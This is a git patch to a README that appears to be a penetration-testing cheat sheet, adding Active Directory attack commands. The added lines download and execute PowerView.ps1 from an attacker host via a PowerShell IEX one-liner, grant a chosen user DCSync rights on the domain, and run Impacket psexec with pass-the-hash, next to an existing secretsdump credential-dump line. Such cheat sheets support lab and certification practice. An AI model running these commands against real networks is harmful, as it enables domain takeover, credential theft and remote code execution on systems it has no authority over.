From 19745ea06b00f4f489e3c23f34b3484144ac8d8c Mon Sep 17 00:00:00 2001
From: Joe Totes <59018247+Totes5706@users.noreply.github.com>
Date: Mon, 5 Sep 2022 15:26:44 -0400
Subject: [PATCH] Update README.md

---
 README.md | 7 +++++++
 1 file changed, 7 insertions(+)

diff --git a/README.md b/README.md
index f0abf47..c02dcdf 100644
--- a/README.md
+++ b/README.md
@@ -618,9 +618,16 @@ sudo ./usr/bin/neo4j console
 # LHOST
 ./BloodHound  --no-sandbox
 
+IEX(New-Object Net.WebClient).downloadstring("http://{IP ADDRESS}/PowerView.ps1")
+$pass = convertto-securestring '{PASSWORD}' -AsPlainText -Force
+$cred = New-Object System.Management.Automation.PSCredential('{DOMAIN}\{USERNAME}', $pass)
+Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC={DOMAIN1},DC={DOMAIN2}" -PrincipalIdentity {USERNAME} -Rights DCSync
+
 # Dump secrets
 sudo python3 ./usr/share/doc/python3-impacket/examples/secretsdump.py '{DOMAIN}/{USERNAME}':'{PASSWORD}'@{IP ADDRESS}
 
+# PSEXEC
+sudo python3 psexec.py -hashes {HASH1:HASH2} {USERNAME}@{IP ADDRESS}